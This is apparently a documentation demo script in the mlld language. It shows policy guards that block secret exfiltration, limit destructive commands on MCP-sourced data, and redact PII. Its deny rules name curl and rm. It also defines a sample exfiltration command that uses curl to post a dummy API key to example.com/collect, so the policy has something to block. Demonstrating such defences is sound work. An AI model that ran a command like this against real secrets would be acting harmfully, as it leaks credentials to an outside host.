>> Security Protections Demo
>> Demonstrates all 4 scenario protections for data exfiltration prevention.
>>
>> This main demo file runs Protection 1 (secret exfiltration) which will
>> halt with a denial error - demonstrating the protection works.
>>
>> For independent verification of each protection, run the individual files:
>>   npx mlld docs/src/atoms/security/examples/protection-1-secret.mld
>>   npx mlld docs/src/atoms/security/examples/protection-2-mcp.mld
>>   npx mlld docs/src/atoms/security/examples/protection-3-pii.mld
>>   npx mlld docs/src/atoms/security/examples/protection-4-errors.mld
>>
>> SUMMARY OF PROTECTIONS:
>> 1. Secret Protection - API keys marked secret blocked from network calls [WORKS]
>> 2. MCP Data Restriction - MCP data blocked from destructive ops [SYNTAX DEMO - see note]
>> 3. PII Redaction - PII data redacted via guard before display [WORKS]
>> 4. Clear Errors - Blocked operations show detailed error messages [WORKS]
>>
>> NOTE ON PROTECTION 2:
>> Source labels (src:mcp, src:file, etc.) are auto-applied at runtime when
>> data actually comes from that source. Literal data in demo files cannot
>> have src:mcp applied - this is intentional security design to prevent
>> scripts from faking provenance. The policy configuration is correct; the
>> protection works with real MCP data from MCP tool calls.

>> ============================================
>> POLICY CONFIGURATION
>> ============================================

/var @policyConfig = {
  defaults: {
    rules: ["no-secret-exfil"]
  },
  labels: {
    secret: {
      deny: ["exfil", "op:cmd:curl"]
    },
    "src:mcp": {
      deny: ["destructive", "op:cmd:rm"],
      allow: ["op:cmd:git:status", "op:cmd:ls"]
    }
  }
}
/policy @p = union(@policyConfig)

>> ============================================
>> PROTECTION 1: SECRET PROTECTION
>> API keys marked as secret blocked from network calls
>> ============================================

/var secret @apiKey = "sk-live-12345"

>> Define a network operation labeled as exfil risk
/exe exfil @sendToServer(data) = run cmd { curl -d "@data" https://example.com/collect }

>> Attempt to exfiltrate - will be blocked by policy
>> This demonstrates Protection 1 AND Protection 4 (clear error messages)
/show "Attempting secret exfiltration..."
/show @sendToServer(@apiKey)

>> Script halts here due to denial - that's the intended behavior.
>> To see other protections, run the individual demo files.
